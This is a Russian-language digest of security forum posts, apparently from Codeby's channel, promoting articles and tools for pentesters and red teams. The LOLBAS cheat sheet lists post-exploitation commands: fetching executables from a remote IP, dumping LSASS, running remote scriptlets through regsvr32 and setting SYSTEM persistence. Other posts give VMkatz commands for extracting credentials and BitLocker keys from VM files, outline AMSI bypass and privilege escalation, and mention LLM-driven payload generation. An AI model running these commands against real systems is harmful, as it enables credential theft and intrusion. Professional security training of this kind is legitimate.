Codeby

Charming Kitten не взламывает системы — они взламывают людей

Недели переписки в WhatsApp, легитимные PDF, приглашения на реальные конференции. И только потом — ссылка. Ни малвари, ни эксплойтов. Просто украденная сессия и полный доступ к Microsoft 365.

APT42 (Charming Kitten, IRGC-IO) работает иначе:

• Фейковые аккаунты журналистов и организаторов конференций выстраивают доверие неделями
• Фишинговые киты перехватывают TOTP-код в реальном времени — MFA не спасает
• Инфраструктура на Google Sites и Cloudflare Workers не триггерит блокировки

Стандартный SOC заточен под вредоносные вложения и подозрительные домены. APT42 не даёт ни того, ни другого — атака идёт на личный Gmail, где корпоративная защита не работает.

Полный kill chain с маппингом на MITRE ATT&CK и примерами детектирования в SIEM:

https://codeby.net/threads/apt42-sotsial-naya-inzheneriya-kak-irgc-khakery-obkhodyat-mfa-i-kradut-uchetnyye-dannyye-bez-malvari.92779/

Непонятный blob в cookie → reverse shell за 30 секунд

За этой «магией» — конкретная механика, которую важно понять, чтобы не застрять в поиске gadget chain на три вечера.

🔍 Как распознать формат в трафике:
• Java: Base64 начинается с rO0AB (байты ac ed 00 05)
• PHP: маркеры O:, a:, s: — читаются глазами
• Python pickle: бинарный поток с байтом \x80

⚙️ Ключевой инсайт: уязвимость — не в библиотеке вроде Apache Commons Collections, а в приложении, которое скармливает недоверенные данные в readObject(). Библиотека в classpath — не дыра. Дыра — когда пользовательский ввод до неё добирается.

Дальше: как подобрать gadget chain через ysoserial и phpggc, какие CVE эксплуатировать на WebLogic и PHP-фреймворках, и как строить цепочки вручную.

https://codeby.net/threads/uyazvimosti-deserializatsii-ekspluatatsiya-cherez-ysoserial-phpggc-i-postroyeniye-gadget-chain.92777/

За апрель на форуме вышло 111 материалов. Мы посмотрели Метрику и увидели закономерность, которую не покажет ни один рейтинг «по просмотрам».

Самая читаемая статья месяца, разбор реальных техник применения LLM в атакующих операциях (569 уникальных читателей). Без хайпа про «ИИ заменит пентестера»: конкретные сценарии разведки, генерация payload под редкий таргет, и та самая граница, за которой модель начинает галлюцинировать и портить операцию.
https://codeby.net/threads/ii-v-penteste-real-nyye-tekhniki-ispol-zovaniya-llm-v-atakuyushchikh-operatsiyakh.92644/

Но интереснее смотреть не на трафик, а на глубину. Техническая статья про kernel rootkit в Linux, перехват syscall table, модификация VFS, сокрытие процессов через /proc, собрала «всего» 280 посетителей. А среднее время чтения 1:37. Для kernel-level материала это аномалия: обычно такие вещи смотрят по диагонали и закрывают на второй странице листинга. Те, кто пришёл, сидели с кодом.
https://codeby.net/threads/kernel-rootkit-linux-perekhvat-syscall-table-modifikatsiya-vfs-i-sokrytiye-protsessov-ot-koda-do-detektirovaniya.92640/

То же самое с апрельским Zero-Day в Telegram (ZDI-CAN-30207, CVSS 9.8). 413 посетителей и показатель отказов 11%, читатели уходили только после того, как дочитывали разбор вектора до конца.
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/

А вот что неожиданно: сравнение OSCP, CEH, eJPT и PNPT, казалось бы, «попсовая» тема про серты, дала средний retention 3:06. Потому что без маркетинга: стоимость, формат экзамена, что реально спрашивают на собеседованиях в РФ, какая серта открывает двери, а какая висит красивым PDF.
https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/

И единственная статья из топа, которая уже собирает органику из Яндекса (CTR 7.7%), roadmap в пентест от практика. Без «выучите тысячи инструментов», с привязкой к реальным вопросам на собесах в 2026.
https://codeby.net/threads/kak-stat-pentesterom-s-nulya-roadmap-ot-cheloveka-kotoryi-proshel-etot-put.92680/

Что из этого следует: на форум приходят не за «новостями из мира ИБ», а за материалом, который можно применить в понедельник на работе. Кто-то дочитывает про rootkit до последнего листинга, кто-то разбирается с сертификацией под конкретную вакансию, кто-то ищет, как устроен CVSS 9.8 изнутри.

А вам что из апрельского зашло сильнее, и что применили в работе?

Burp Suite + OWASP Top 10: какой плагин ставить и зачем

Один extension на каждую категорию OWASP:

• A01 Broken Access Control → Autorize: вставил cookie низкопривилегированного юзера, браузишь как админ — красный «Bypassed!» = готовый IDOR
• A03 Injection → ActiveScan++: добавляет XXE, SSTI, улучшенный SQLi
• A04 Insecure Design → Turbo Intruder: race conditions на промокодах — тысячи req/sec
• A07 Auth Failures → JWT Editor: атаки alg:none, weak secret, key confusion из Repeater
• A10 SSRF → Collaborator Everywhere: браузишь приложение, extension инжектирует заголовки и ловит out-of-band callbacks

Плюс Param Miner (до 65 000 параметров за запрос) и Retire.js для уязвимых JS-библиотек.

https://codeby.net/threads/burp-suite-extensions-shpargalka-po-owasp-top-10-2025-kakoi-plagin-stavit-i-zachem.92768/

Комбинация, которая обычно не собирается в одном резюме: сетевик с действующим CCNA, 15 лет практики, удалённый формат по умолчанию и четыре рабочих языка — русский, английский, грузинский, греческий.

На форуме Codeby появился специалист, который закрывает связку «сети — системное администрирование — кибербез — техподдержка» без дробления на четыре разные роли. За плечами — полтора десятка лет в проде и действующие сертификаты Cisco и Microsoft.

Такой профиль имеет смысл присмотреть, если вы:
— держите небольшой интегратор или MSP и не готовы выделять отдельных людей под каждое направление;
— работаете с клиентами на Кипре, в Греции или в Грузии и регулярно упираетесь в языковой барьер;
— ищете внешние руки для сетевой инфраструктуры без найма сетевика в штат;
— закрываете NOC/поддержку по дежурствам и нужен универсал, который не путается в вопросах безопасности.

Специалистов с таким стажем в сетях обычно быстро «поднимают» в архитекторы или замыкают на одного вендора. Универсалы-удалёнщики со свежими сертификатами и несколькими рабочими языками — скорее исключение, чем норма.

Полный профиль с контактами — в теме резюме: https://codeby.net/threads/ishchu-rabotu-v-sfere-it.92754/

Ищете других кандидатов или хотите разместить вакансию — раздел «Карьера в ИБ»: https://codeby.net/forums/kar-yera-v-ib-vakansii-i-proyekty.23/

👥VMkatz

Инструмент для извлечения учетных данных Windows (хэши NTLM, мастер-ключи DPAPI, билеты Kerberos, кэшированные учетные данные домена, секреты LSA, NTDS.dit, ключи BitLocker) непосредственно из снимков памяти и виртуальных дисков на сетевом хранилище, в гипервизоре и везде, где находятся файлы виртуальной машины.

Для работы используется один статический двоичный файл размером ~3 МБ. Загрузите его на хост ESXi, узел Proxmox или в сетевое хранилище. Укажите .vmsn или .vmdk или целую папку с виртуальными машинами. Получите учетные данные, а не образы дисков.

⬇️Установка
Клонируем репозиторий, компилируем. Двоичный файл будет лежать по пути target/x86_64-unknown-linux-musl/release.

git clone https://github.com/nikaiw/VMkatz.git
cd VMkatz
cargo build --release --target x86_64-unknown-linux-musl
cd target/x86_64-unknown-linux-musl/release
./vmkatz —help

Поддерживаемые входные данные
📉Снимки VMware в формате .vmsn + .vmem;
📉Встроенные снимки VMware в формате .vmsn (без .vmem);
📉Сохранённые состояния VirtualBox в формате .sav;
📉Состояния savevm QEMU/KVM;
📉ELF core dump’ы QEMU/KVM в формате .elf;
📉Сохранённые состояния Hyper-V в формате .vmrs;
📉Виртуальные диски VMware в формате .vmdk;
📉Виртуальные диски VirtualBox в формате .vdi;
📉Виртуальные диски QEMU/KVM в формате .qcow2;
📉Виртуальные диски Hyper-V в формате .vhdx, .vhd;
📉RAW SCSI-устройства VMFS-5/6 в формате /dev/disks/...;
📉Сырые файлы реестра Windows в формате SAM, SYSTEM, SECURITY;
📉Сырой файл NTDS.dit в формате ntds.dit + SYSTEM;
🖱Минидамп процесса LSASS в формате .dmp.

Использование
1️⃣Извлечение учетных данных LSASS из снимка VMware.

./vmkatz snapshot.vmsn

2️⃣Указание пути до виртуальной директории с целью поиска необходимых файлов.

./vmkatz /path/to/vm-directory/

3️⃣Экспорт BitLocker FVEK.

./vmkatz --bitlocker-fvek /tmp/keys snapshot.vmsn

4️⃣Рекурсивное сканирование всех виртуальных машин по пути /vmfs/volumes/datastore1/.

./vmkatz -r /vmfs/volumes/datastore1/

#tools #credentials #vmware

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Beacon жив — но через 60 секунд его нет

Initial access получен, C2 поднят. Потом `MsMpEng.exe` режет нагрузку, Script Block Logging пишет каждый чих, AppLocker не даёт запустить ничего. Знакомо?

🔍 Windows-защита — четыре независимых эшелона:
• Статический движок Defender — сигнатуры, ML, PE-фичи
• AMSI — runtime-перехват в адресном пространстве процесса
• ETW — телеметрия для EDR на kernel-level
• AppLocker — application whitelisting на уровне user-mode

Ключевой инсайт: охранник сидит в одной камере с заключённым. amsi.dll загружается в каждую PowerShell-сессию с теми же привилегиями, что и вредоносный код. Классический патчинг AmsiScanBuffer оставляет следы в .text-секции — EDR это видит. Hardware breakpoints через DR0–DR3 обходят сканирование без записи в память.

https://codeby.net/threads/obkhod-windows-defender-i-amsi-prakticheskii-gaid-po-defense-evasion-dlya-red-team.92763/

SeImpersonatePrivilege — и ты уже на полпути к SYSTEM

Получил reverse shell от доменного юзера. whoami /priv — стандартный набор, ничего интересного. Что дальше?

🎯 Порядок приоритетов при LPE:

1. Токен — SeImpersonatePrivilege у сервисных аккаунтов IIS/MSSQL открывает Potato-атаки прямо к SYSTEM
2. Сервисы — Unquoted Service Path встречается на каждом втором пентесте, а SERVICE_CHANGE_CONFIG для группы Users — прямой билет наверх
3. UAC bypass — десятки техник без GUI, когда застрял на medium integrity
4. Kernel exploits — последнее средство: объяснять заказчику BSOD на продакшне — сомнительное удовольствие

⚡ Если оба ключа AlwaysInstallElevated выставлены в `1` — любой MSI устанавливается от SYSTEM.

Полный разбор техник, команд и нюансов эксплуатации:

https://codeby.net/threads/povysheniye-privilegii-windows-ekspluatatsiya-miskonfiguratsii-tokenov-i-obkhod-uac-na-praktike.92759/

LOLBAS шпаргалка: пост-эксплуатация Windows штатными средствами

EDR снёс инструментарий, но cmd/PowerShell живы — Windows сама несёт всё нужное:

• curl.exe -s -o C:\Temp\f.exe http://IP/f.exe — загрузка файла (Win10 1803+), сигнатуры слабее чем на certutil

• rundll32.exe comsvcs.dll, MiniDump C:\Temp\lsass.dmp full — дамп LSASS без Mimikatz, нужен SeDebugPrivilege

• regsvr32.exe /s /n /u /i:http://IP/payload.sct scrobj.dll — Squiblydoo, обход AppLocker

• msbuild.exe C:\Temp\payload.csproj — компиляция C# inline, обход AppLocker

• schtasks /create /tn "WindowsUpdate" /tr "beacon.exe" /sc onlogon /ru SYSTEM /f — persistence без PowerShell

ATT&CK-маппинг, флаги и ограничения (WDAC, Server Core) — в полной шпаргалке:

https://codeby.net/threads/lolbas-shpargalka-komandy-post-ekspluatatsii-windows-bez-storonnikh-instrumentov.92752/

WPProbe: Инструмент для сканирования и оценки безопасности WordPress

WPProbe — это высокопроизводительный сканер безопасности с открытым исходным кодом, предназначенный для обнаружения установленных плагинов и тем WordPress, а также их сопоставления с известными уязвимостями из баз данных Wordfence и WPScan. Инструмент использует WordPress для скрытного обнаружения компонентов, что позволяет минимизировать риск блокировки со стороны систем безопасности. WPProbe разработан для использования специалистами по тестированию на проникновение, администраторами сайтов и исследователями безопасности.

🎇Основные функции
- Скрытное обнаружение через REST API (идентификация более 5000 плагинов без прямого перебора директорий)
- Три режима сканирования - Stealthy (по умолчанию), Bruteforce, Hybrid
- Поддержка сканирования нескольких целей одновременно
- Поддержка JSON и CSV для интеграции в конвейеры обработки
- Фильтрация по CVE, плагину, критичности и типу аутентификации
- Встроенный механизм обновления бинарного файла и базы данных

⬇️Установка

sudo apt  install wpprobe

Проверка

wpprobe -h

⏺️Для получения свежих данных непосредственно от Wordfence можно использовать бесплатный API-ключ

#с указанием ключа
wpprobe update-db --api-key ваш_wordfence_api_ключ

#или через переменную окружения
export WORDFENCE_API_KEY=ваш_ключ
wpprobe update-db

⏺️Базовое сканирование одного сайта

wpprobe scan -u https://example.com

⏺️Сканирование с указанием режима

#скрытный режим (по умолчанию)
wpprobe scan -u https://example.com --mode stealthy

#агрессивный режим (прямой перебор)
wpprobe scan -u https://example.com --mode bruteforce

#гибридный режим
wpprobe scan -u https://example.com --mode hybrid

⏺️Массовое сканирование из файла (файл targets.txt содержит по одному URL на строку)

wpprobe scan -f targets.txt -t 20

Параметр -t задает количество одновременных потоков для ускорения обработки

⏺️Сохранение результатов

#CSV формат
wpprobe scan -u https://example.com -o results.csv

#JSON формат
wpprobe scan -u https://example.com -o results.json

⏺️Поиск уязвимостей по CVE

wpprobe search --cve CVE-2024-1234

⏺️Быстрая проверка клиентского сайта перед обновлением

wpprobe update-db
wpprobe scan -u https://client-site.com -o scan_report.csv

⏺️Поиск критических уязвимостей для приоритетного исправления

wpprobe search --severity critical --details

⏺️Проверка нового плагина перед установкой

wpprobe search --plugin newly-acquired-plugin-name

🔎Ограничения и рекомендации
- Скрытный метод обнаружения требует, чтобы REST API WordPress был доступен. Некоторые плагины или настройки безопасности могут его отключать
- Если плагин установлен, но неактивен или скрыт системами безопасности, он может остаться незамеченным
- Для максимальной точности рекомендуется использовать API-ключи для получения свежих данных

#WordPress #PluginScanner #RESTAPI #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером